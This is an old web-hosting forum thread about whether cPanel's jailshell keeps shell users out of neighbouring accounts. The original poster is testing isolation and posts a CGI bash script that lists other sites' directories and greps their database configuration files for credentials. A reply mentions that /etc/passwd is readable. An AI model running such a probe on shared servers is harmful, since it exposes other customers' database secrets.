The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Shell Jail.. is it available in cPanel?

Discussion in 'General Discussion' started by SupermanInNY, Sep 22, 2003.

  1. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    Hi all,

    I'm in the process of purchasing a new control panel and I'm checking cPanel, Plesk and Ensim.

    Ensim claim that they got the Pro version so tight that you cannot visit your neighbouring domains on the same server.

    Plesk have something called sandbox which is perhaps the very same thing.

    What about cPanel? How secure is cPanel in that sense?
    I've pushed away users who wanted to do e-commerce simply because I know (well....with Ensim 3.1 not the pro) that I can see other accounts and if I can see them.. they can see me and I don't have a towel with me (for those who read "The Hitchhiker's guide to the galaxy" you would know what the
    towel is used for).

    I have a linux guro that is working with me and that will do his best (and he is an expert in the field) to try to "snoop" around and find volunerabilities (sp?) in the system - no malicious acts, just find and report.

    Can anyone "donate" a regular account for testing to see if while using a shell account, it is possible to view other accounts on the same server?

    I need an account for a period of few days (size wise we only need about 50MB and bandwidth is a non-issue).

    Any takers?

    -Alon
    alon@wsco.com

    cPanel.net Support Ticket Number:
     
  2. Angel78

    Angel78 Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    413
    Likes Received:
    1
    Trophy Points:
    16
    Jail Shell is available for SSH accounts in Cpanel.

    And sorry but at least I wont give Shell access to unknown persons. Perhaps you could ask cpaneljosh (nickname on board) to give you test account or email cpanel ppl and ask for 15 day try-out licence (and install it on your server)

    :)

    cPanel.net Support Ticket Number:
     
  3. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    Hi... and thanks for the reply.

    "...and sorry but at least I wont give Shell access to unknown persons".

    I plan on providing hosting services where I am going to give Shell accounts to every domain.

    I don't know who my customers are. for me they are all unknown persons, and therefore that is exactly the reason I'm looking to verify that the accounts are secure.

    I can transfer a domain to your site if that helps in anyway.
    Does it?

    Thanks for you help.

    -Alon.

    cPanel.net Support Ticket Number:
     
  4. ljprevo

    ljprevo Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    67
    Likes Received:
    0
    Trophy Points:
    6
    My opinion only here, but I feel if you did this you are asking for trouble. I only give it to customers on a request basis and only after I have called and talked to them on the phone.

    You do this you have all them shell accounts hanging out there ready to for someone to try and exploit one of them. As not to mention but I would guess 75% of your customers will never use shell access.

    cPanel.net Support Ticket Number:
     
  5. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    "I would guess 75% of your customers will never use shell access"

    That maybe true, but in order for me to differnciate my service from other services, I offer a full service account.

    I also make this to appeal to Students as a target audience. Sciene major students get linux accounts as school, but are then missing out on the domain and email option.

    Yes.. I ask for trouble. No doubt. :).

    But, before I go out and put my self out and hang myself,.. I'm trying to find out if what I'm asking for is really that dangerous.

    And that is the reason I'm posting this thread. I want to find out if it is safe or not.

    I personally use Shell almost every day doing programing and enhancement and installs. I can't have an account without a shell.
    I expect that I'm not the only one who is in such need.
    As it is today..I am carefull not to leave lose ends.. such a important info in the public area, but that is using Ensim 3.11 which is known to be unsafe.

    So,.. can anyone give me an account to tryout?
    I promise I'll share all the 'good' and 'bad' info about what I was able to pull with the provider (and only with the provider).


    Thanks,

    -Alon.
    alon@wsco.com

    cPanel.net Support Ticket Number:
     
  6. ljprevo

    ljprevo Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    67
    Likes Received:
    0
    Trophy Points:
    6
    I understand where you are coming from completely.

    I do budget hosting, so the importance of shell access is not really needed.

    I am not trying to dis you at all. I commend you for researching the dangers and how to avoid them before proceeding, there are a lot of host that don't and open the flood gates for everyone.

    Why not

    shell access*

    * - certain conditions here.

    Don't turn it on for the regular job, just by request only.

    Something to think about.

    cPanel.net Support Ticket Number:
     
  7. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    I'll definatly take it under advisement. But,.. in the event that I've already am consenting to provide it,. I need (not just want) to know the current volunerabilities and at least be coincious about it and perhaps alert prospective users of it's caveats. The lattar portion is designed specifically to avoid any risks of getting into a lawsuit should one customer get "hit" by some other customer.

    So again.. my call is to.. a n y o n e that would want to find out if that issue is handled or needs handling by cPanel.

    -Alon
    alon@wsco.com

    cPanel.net Support Ticket Number:
     
  8. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    I'll definatly take it under advisement. But,.. in the event that I've already am consenting to provide it,. I need (not just want) to know the current volunerabilities and at least be coincious about it and perhaps alert prospective users of it's caveats. The lattar portion is designed specifically to avoid any risks of getting into a lawsuit should one customer get "hit" by some other customer.

    So again.. my call is to.. a n y o n e that would want to find out if that issue is handled or needs handling by cPanel.

    -Alon
    alon@wsco.com

    cPanel.net Support Ticket Number:
     
  9. pirania1

    pirania1 Well-Known Member

    Joined:
    May 10, 2003
    Messages:
    126
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Miami, FL
    Why don't you get trial licence from Cpanel and try it on your machine?
    There is not many people here that would risk compromising their machine to anonymous person.
    When someone orders the shell, we can always do fraud screening and have credit card on file to charge any costs of server restore.
    Understand.. Anyone can post here, so giving out shells to anonymous people is not the best thing to do.
    My advice is for you to get trial licence for cpanel and try it out.

    cPanel.net Support Ticket Number:
     
  10. trakwebster

    trakwebster Well-Known Member

    Joined:
    Jan 29, 2003
    Messages:
    145
    Likes Received:
    0
    Trophy Points:
    16
    If it's not indiscrete, would you tell how you go about fraud screening? What steps you take?

    I would be grateful to know.
     
  11. webmeister

    webmeister Member

    Joined:
    Aug 5, 2002
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    jail shell hell

    personally, i could NOT use a whm/cpanel account without some kind of shell access... the company where i get my reseller account was quick and kind to provide me with jailshell hell access... :cool: ... i'm a vnc fan used to running as root! jailshell hell is weak (to me) because of it's security (good for you) ... it sux... but sure beats the crap out of NOT having it... the way i look at it regular backups are the solution... so IF you get a bad customer who takes advantage you can roll back... the whole point of computing is to FREE us from limitations, not limit us because of possible abuses... that's how commies and politicians work... let's just DO IT and fix the bugs as we go along... but i have only been programming full-time since 1975 using everything from toggle switches to 80 column punch cards on 10 different programming languages using everthing from assembler to the ms visual crap and all the modern toys, so what do i know?

    of course when it comes to testing a system i usually just cough up the $20-$30 and test it... instead of spending days looking for a free account i just pay for one and if it's not any good ask for a good faith refund...

    8-D

    cPanel.net Support Ticket Number:
     
  12. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    Folks, just try to place this in a test file and see if you get any info.

    name the file as test.cgi and place it in a cgi-bin directory, or the html directory.
    This is from an Ensime directory scheme, so you can modify the /home/virtual to the cPanel designed structure.

    I'm curious to know if anything pulls up.
    In Ensim,. you get a listing of all the accounts on the server and you can then even issue the grep command (as shown here) and search for the key words and run a vi on those files that pull up.

    I'd like to know if this is something I can expect to see with cPanel as well (I hope not).

    -Alon.


    Code:
    #!/bin/bash
    
    echo Content-Type: text/plain
    echo
    ls -ltr /home/virtual/
    
    
    echo cat /proc/cpuinfo
    cat /proc/cpuinfo
    
    echo cat /proc/meminfo
    cat /proc/meminfo
    
    
    #ls -ltr  /home/virtual/site12/fst/var/www/html/
    grep base /home/virtual/site12/fst/var/www/html/include/database.php
    vi /home/virtual/site16/fst/var/www/html/Connections/main.php
    grep db /home/virtual/site52/fst/var/www/html/config.php
    vi /home/virtual/site62/fst/var/www/html/db.php
    
     
    #12 SupermanInNY, Oct 6, 2003
    Last edited: Oct 6, 2003
  13. sly2k

    sly2k Registered

    Joined:
    Nov 12, 2003
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    from a jailshell in CPanel you can read /proc but you cannot see any other directories but your own in /home/

    you can read all the /etc files and everything.. which I dont like much. that includes /etc/passwd btw
     
  14. Arthur

    Arthur Member

    Joined:
    Jan 23, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Your script doesn't work if you enable suEXEC and webroot protection .
     
Loading...

Share This Page